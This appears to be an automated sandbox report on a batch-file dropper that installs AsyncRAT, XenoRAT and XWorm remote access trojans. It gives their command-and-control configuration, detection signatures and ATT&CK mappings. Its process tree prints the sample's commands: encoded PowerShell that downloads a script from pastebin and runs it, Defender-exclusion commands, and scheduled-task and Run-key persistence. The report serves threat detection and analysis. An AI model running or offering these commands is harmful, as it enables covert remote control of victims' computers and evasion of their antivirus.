asyncrat | c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559

Resubmissions

08-12-2024 23:35

241208-3k15zawkhx 10

08-12-2024 12:59

241208-p8a2ssypfk 10

Analysis

max time kernel
148s
max time network
150s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
08-12-2024 23:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LHVWN_virus_src.bat
Size

680B
MD5

28a24f08a62dc5c8af6be5e921d4c5ad
SHA1

97f70c14a8e2ba4da9d8f5d65961d7d998ebb637
SHA256

c76ca39fdae22faae9ae3799475307e34d351d02e048e3805a6ce5d6848db559
SHA512

e9ec36ad33f78ac2871bb1a36a746ab74fd502b64fd01d36434192b2bc5244fc56d44ca5989af7de15bdf2b46a9a35990f759867ace6253ec9d1393e4cb9a577

Score

10^/10

asyncrat xenorat xworm comppkgsrv discovery execution persistence rat trojan

Malware Config

Extracted

Family

xenorat

82.13.154.169

Mutex

09f0agdksogvisd0gdsjpogijdsihg89t2374ygh23b5023gyd79srtdfgbalkfnmvsakfnsajdio32y8956tyhtijdesaiosahf85295u3497348huasnfjasfa86a7s6g70duhgfdaguh7dsa6gdayghdughuiagfad6ga760ghad8ga6gad75asfgagnhalkjs90436r7tgafhafyasuft7as5asf083y5sfsafsa789fyahufas

Attributes

delay
5000
install_path
appdata
port
4445
startup_name
svchost

Extracted

Family

asyncrat

Botnet

CompPkgSrv

82.13.154.169:4446

Attributes

delay
5
install
true
install_file
CompPkgSrv.exe
install_folder
%AppData%

aes.plain

Extracted

Family

xworm

82.13.154.169:4444

Attributes

Install_directory
%AppData%
install_file
CompPkgSup.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect XenoRat Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002c00000004515b-61.dat	family_xenorat
behavioral1/memory/2136-71-0x0000000000F00000-0x0000000000F12000-memory.dmp	family_xenorat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x002c00000004518d-94.dat	family_xworm
behavioral1/memory/440-104-0x00000000009D0000-0x00000000009EA000-memory.dmp	family_xworm

XenorRat
XenorRat is a remote access trojan written in C#.
trojan rat xenorat
Xenorat family
xenorat
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0028000000045175-76.dat	family_asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
9	332	powershell.exe
18	4884	powershell.exe
20	4884	powershell.exe
70	3264	powershell.exe
73	4228	powershell.exe
74	4228	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3264	powershell.exe
4788	powershell.exe
4228	powershell.exe
332	powershell.exe
3688	powershell.exe
4884	powershell.exe
4592	powershell.exe
5076	powershell.exe
4652	powershell.exe
1924	powershell.exe
3960	powershell.exe
1848	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation	CompPkgSup.exe
Key value queried	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation	svchost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation	CompPkgSrv.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkgSup.lnk	CompPkgSup.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkgSup.lnk	CompPkgSup.exe

Executes dropped EXE 10 IoCs

pid	Process
2136	svchost.exe
4820	svchost.exe
4284	CompPkgSrv.exe
440	CompPkgSup.exe
4136	CompPkgSrv.exe
700	CompPkgSup.exe
4224	CompPkgSup.exe
4948	svchost.exe
2092	CompPkgSrv.exe
4696	CompPkgSup.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkgSup = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkgSup.exe"	CompPkgSup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
7	pastebin.com
9	pastebin.com
19	raw.githubusercontent.com
20	raw.githubusercontent.com
70	pastebin.com
74	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
26	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1656	timeout.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000_Classes\Local Settings	powershell.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1736	NOTEPAD.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3592	schtasks.exe
2140	schtasks.exe
3788	schtasks.exe
3844	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4592	powershell.exe
4592	powershell.exe
332	powershell.exe
332	powershell.exe
3688	powershell.exe
3688	powershell.exe
4884	powershell.exe
4884	powershell.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4284	CompPkgSrv.exe
4652	powershell.exe
4652	powershell.exe
4652	powershell.exe
1924	powershell.exe
1924	powershell.exe
1924	powershell.exe
3960	powershell.exe
3960	powershell.exe
3960	powershell.exe
1848	powershell.exe
1848	powershell.exe
1848	powershell.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe
440	CompPkgSup.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4592	powershell.exe
Token: SeDebugPrivilege	332	powershell.exe
Token: SeDebugPrivilege	3688	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeIncreaseQuotaPrivilege	4884	powershell.exe
Token: SeSecurityPrivilege	4884	powershell.exe
Token: SeTakeOwnershipPrivilege	4884	powershell.exe
Token: SeLoadDriverPrivilege	4884	powershell.exe
Token: SeSystemProfilePrivilege	4884	powershell.exe
Token: SeSystemtimePrivilege	4884	powershell.exe
Token: SeProfSingleProcessPrivilege	4884	powershell.exe
Token: SeIncBasePriorityPrivilege	4884	powershell.exe
Token: SeCreatePagefilePrivilege	4884	powershell.exe
Token: SeBackupPrivilege	4884	powershell.exe
Token: SeRestorePrivilege	4884	powershell.exe
Token: SeShutdownPrivilege	4884	powershell.exe
Token: SeDebugPrivilege	4884	powershell.exe
Token: SeSystemEnvironmentPrivilege	4884	powershell.exe
Token: SeRemoteShutdownPrivilege	4884	powershell.exe
Token: SeUndockPrivilege	4884	powershell.exe
Token: SeManageVolumePrivilege	4884	powershell.exe
Token: 33	4884	powershell.exe
Token: 34	4884	powershell.exe
Token: 35	4884	powershell.exe
Token: 36	4884	powershell.exe
Token: SeDebugPrivilege	440	CompPkgSup.exe
Token: SeDebugPrivilege	4284	CompPkgSrv.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeIncreaseQuotaPrivilege	4652	powershell.exe
Token: SeSecurityPrivilege	4652	powershell.exe
Token: SeTakeOwnershipPrivilege	4652	powershell.exe
Token: SeLoadDriverPrivilege	4652	powershell.exe
Token: SeSystemProfilePrivilege	4652	powershell.exe
Token: SeSystemtimePrivilege	4652	powershell.exe
Token: SeProfSingleProcessPrivilege	4652	powershell.exe
Token: SeIncBasePriorityPrivilege	4652	powershell.exe
Token: SeCreatePagefilePrivilege	4652	powershell.exe
Token: SeBackupPrivilege	4652	powershell.exe
Token: SeRestorePrivilege	4652	powershell.exe
Token: SeShutdownPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeSystemEnvironmentPrivilege	4652	powershell.exe
Token: SeRemoteShutdownPrivilege	4652	powershell.exe
Token: SeUndockPrivilege	4652	powershell.exe
Token: SeManageVolumePrivilege	4652	powershell.exe
Token: 33	4652	powershell.exe
Token: 34	4652	powershell.exe
Token: 35	4652	powershell.exe
Token: 36	4652	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeIncreaseQuotaPrivilege	1924	powershell.exe
Token: SeSecurityPrivilege	1924	powershell.exe
Token: SeTakeOwnershipPrivilege	1924	powershell.exe
Token: SeLoadDriverPrivilege	1924	powershell.exe
Token: SeSystemProfilePrivilege	1924	powershell.exe
Token: SeSystemtimePrivilege	1924	powershell.exe
Token: SeProfSingleProcessPrivilege	1924	powershell.exe
Token: SeIncBasePriorityPrivilege	1924	powershell.exe
Token: SeCreatePagefilePrivilege	1924	powershell.exe
Token: SeBackupPrivilege	1924	powershell.exe
Token: SeRestorePrivilege	1924	powershell.exe
Token: SeShutdownPrivilege	1924	powershell.exe
Token: SeDebugPrivilege	1924	powershell.exe
Token: SeSystemEnvironmentPrivilege	1924	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
440	CompPkgSup.exe

Suspicious use of WriteProcessMemory 63 IoCs

description	pid	Process	procid_target
PID 3804 wrote to memory of 4592	3804	cmd.exe	82
PID 3804 wrote to memory of 4592	3804	cmd.exe	82
PID 4592 wrote to memory of 2600	4592	powershell.exe	83
PID 4592 wrote to memory of 2600	4592	powershell.exe	83
PID 2600 wrote to memory of 332	2600	cmd.exe	85
PID 2600 wrote to memory of 332	2600	cmd.exe	85
PID 2600 wrote to memory of 3688	2600	cmd.exe	86
PID 2600 wrote to memory of 3688	2600	cmd.exe	86
PID 3688 wrote to memory of 4884	3688	powershell.exe	87
PID 3688 wrote to memory of 4884	3688	powershell.exe	87
PID 4884 wrote to memory of 2136	4884	powershell.exe	92
PID 4884 wrote to memory of 2136	4884	powershell.exe	92
PID 4884 wrote to memory of 2136	4884	powershell.exe	92
PID 2136 wrote to memory of 4820	2136	svchost.exe	94
PID 2136 wrote to memory of 4820	2136	svchost.exe	94
PID 2136 wrote to memory of 4820	2136	svchost.exe	94
PID 4884 wrote to memory of 4284	4884	powershell.exe	95
PID 4884 wrote to memory of 4284	4884	powershell.exe	95
PID 4884 wrote to memory of 440	4884	powershell.exe	96
PID 4884 wrote to memory of 440	4884	powershell.exe	96
PID 4820 wrote to memory of 2140	4820	svchost.exe	98
PID 4820 wrote to memory of 2140	4820	svchost.exe	98
PID 4820 wrote to memory of 2140	4820	svchost.exe	98
PID 4284 wrote to memory of 4256	4284	CompPkgSrv.exe	102
PID 4284 wrote to memory of 4256	4284	CompPkgSrv.exe	102
PID 4284 wrote to memory of 1064	4284	CompPkgSrv.exe	103
PID 4284 wrote to memory of 1064	4284	CompPkgSrv.exe	103
PID 1064 wrote to memory of 1656	1064	cmd.exe	106
PID 1064 wrote to memory of 1656	1064	cmd.exe	106
PID 4256 wrote to memory of 3788	4256	cmd.exe	107
PID 4256 wrote to memory of 3788	4256	cmd.exe	107
PID 440 wrote to memory of 4652	440	CompPkgSup.exe	108
PID 440 wrote to memory of 4652	440	CompPkgSup.exe	108
PID 440 wrote to memory of 1924	440	CompPkgSup.exe	110
PID 440 wrote to memory of 1924	440	CompPkgSup.exe	110
PID 440 wrote to memory of 3960	440	CompPkgSup.exe	112
PID 440 wrote to memory of 3960	440	CompPkgSup.exe	112
PID 440 wrote to memory of 1848	440	CompPkgSup.exe	114
PID 440 wrote to memory of 1848	440	CompPkgSup.exe	114
PID 1064 wrote to memory of 4136	1064	cmd.exe	116
PID 1064 wrote to memory of 4136	1064	cmd.exe	116
PID 440 wrote to memory of 3844	440	CompPkgSup.exe	117
PID 440 wrote to memory of 3844	440	CompPkgSup.exe	117
PID 3592 wrote to memory of 5076	3592	cmd.exe	135
PID 3592 wrote to memory of 5076	3592	cmd.exe	135
PID 5076 wrote to memory of 3040	5076	powershell.exe	136
PID 5076 wrote to memory of 3040	5076	powershell.exe	136
PID 3040 wrote to memory of 3264	3040	cmd.exe	138
PID 3040 wrote to memory of 3264	3040	cmd.exe	138
PID 3040 wrote to memory of 4788	3040	cmd.exe	139
PID 3040 wrote to memory of 4788	3040	cmd.exe	139
PID 4788 wrote to memory of 4228	4788	powershell.exe	140
PID 4788 wrote to memory of 4228	4788	powershell.exe	140
PID 4228 wrote to memory of 4948	4228	powershell.exe	142
PID 4228 wrote to memory of 4948	4228	powershell.exe	142
PID 4228 wrote to memory of 4948	4228	powershell.exe	142
PID 4228 wrote to memory of 2092	4228	powershell.exe	143
PID 4228 wrote to memory of 2092	4228	powershell.exe	143
PID 4228 wrote to memory of 4696	4228	powershell.exe	144
PID 4228 wrote to memory of 4696	4228	powershell.exe	144
PID 4948 wrote to memory of 3592	4948	svchost.exe	145
PID 4948 wrote to memory of 3592	4948	svchost.exe	145
PID 4948 wrote to memory of 3592	4948	svchost.exe	145

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath 'C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat' -ArgumentList "am_admin"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4592
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:332
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4884
      - C:\Users\Admin\AppData\Local\svchost.exe
        
        "C:\Users\Admin\AppData\Local\svchost.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2136
        
        C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe
        
        "C:\Users\Admin\AppData\Roaming\XenoManager\svchost.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFF01.tmp" /F
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2140
      - C:\Users\Admin\AppData\Local\CompPkgSrv.exe
        
        "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4284
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"' & exit
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4256
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "CompPkgSrv" /tr '"C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"'
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp2D9.tmp.bat""
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1064
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        8⤵
        Delays execution with timeout.exe
        
        PID:1656
        
        C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe
        
        "C:\Users\Admin\AppData\Roaming\CompPkgSrv.exe"
        8⤵
        Executes dropped EXE
        
        PID:4136
      - C:\Users\Admin\AppData\Local\CompPkgSup.exe
        
        "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
        6⤵
        Checks computer location settings
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\CompPkgSup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4652
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1924
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\CompPkgSup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'CompPkgSup.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1848
        
        C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "CompPkgSup" /tr "C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3844

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4896

C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
"C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
1⤵
- Executes dropped EXE
PID:700

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Admin\AppData\Local\sysboot.ps1"
1⤵
PID:4404

C:\Users\Admin\AppData\Roaming\CompPkgSup.exe
"C:\Users\Admin\AppData\Roaming\CompPkgSup.exe"
1⤵
- Executes dropped EXE
PID:4224

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat
1⤵
- Opens file in notepad (likely ransom note)
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process -Verb RunAs -FilePath '"C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat"' -ArgumentList "am_admin"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\LHVWN_virus_src.bat" am_admin
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3040
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc KABpAHcAcgAgAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AQQBlAHYAaAB1AEgAdgBaACkALgBjAG8AbgB0AGUAbgB0ACAAPgAgACQAZQBuAHYAOgBMAE8AQwBBAEwAQQBQAFAARABBAFQAQQBcAHMAeQBzAGIAbwBvAHQALgBwAHMAMQA=
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      PID:3264
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -NoLogo -enc cABvAHcAZQByAHMAaABlAGwAbAAgAC0AbgBvAGUAeABpAHQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAAQgB5AHAAYQBzAHMAIAAtAEYAaQBsAGUAIAAkAGUAbgB2ADoATABPAEMAQQBMAEEAUABQAEQAQQBUAEEAXABzAHkAcwBiAG8AbwB0AC4AcABzADEADQAKAA==
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of WriteProcessMemory
      PID:4788
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\sysboot.ps1
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of WriteProcessMemory
        
        PID:4228
      - C:\Users\Admin\AppData\Local\svchost.exe
        
        "C:\Users\Admin\AppData\Local\svchost.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4948
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks.exe" /Create /TN "svchost" /XML "C:\Users\Admin\AppData\Local\Temp\tmpB4C.tmp" /F
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3592
      - C:\Users\Admin\AppData\Local\CompPkgSrv.exe
        
        "C:\Users\Admin\AppData\Local\CompPkgSrv.exe"
        6⤵
        Executes dropped EXE
        
        PID:2092
      - C:\Users\Admin\AppData\Local\CompPkgSup.exe
        
        "C:\Users\Admin\AppData\Local\CompPkgSup.exe"
        6⤵
        Executes dropped EXE
        
        PID:4696

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\CompPkgSrv.exe

Filesize
63KB

MD5
8638cc0d3500789aa3150223f6250016

SHA1
77a0dad2b97072988baed56fc208664ef1b182c9

SHA256
7ea1f9204c8a9a90eea81e51b6ac5a6dbad96e961f068b2cb63590b04ae7f972

SHA512
9ea193f04f6b8b1c2cc0c32b1f47ede423c3cffa5fa1cdc453aef307c1db693895cec0c4cfa3f595655976149c17d1d33e51a2891274e2d7588f018fd8c53c0d

Download Submit
C:\Users\Admin\AppData\Local\CompPkgSup.exe

Filesize
80KB

MD5
82ae01d348fce7ddf9f19ca5cb545ae1

SHA1
5b563cec5b49c7ec4082bf19aeccce9fc190bd2a

SHA256
4a322c3526936f921b75cadc7c2a827b8eeca29f6a929d9077751a3777ef378d

SHA512
6a8ba6397c38661df7eda751a0340df08645da88e3b4a563d9ba9e3849b7332677ca4acf3c41235883d75b737c5b3a91c871c95dc87808f753fa85717338b1ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSrv.exe.log

Filesize
871B

MD5
b0f2bb247ffd1764eb7baef875f88d9b

SHA1
5ffdf99ecc1ea1a1c2a26ab17579781bd65e3234

SHA256
f89eeacddc1ed0757a98489d15b92d084e8cca3bf3aa24b788029a2f9f4da7a9

SHA512
7bd00559959aedfadaa04ddd3502283dd8a8f357ab129754024db494648c08200dbc0e62d64c6b0b2e7255e610e207a8de97d3c1137d46d27bdfa092826bdc89

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\CompPkgSup.exe.log

Filesize
654B

MD5
11c6e74f0561678d2cf7fc075a6cc00c

SHA1
535ee79ba978554abcb98c566235805e7ea18490

SHA256
d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

SHA512
32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
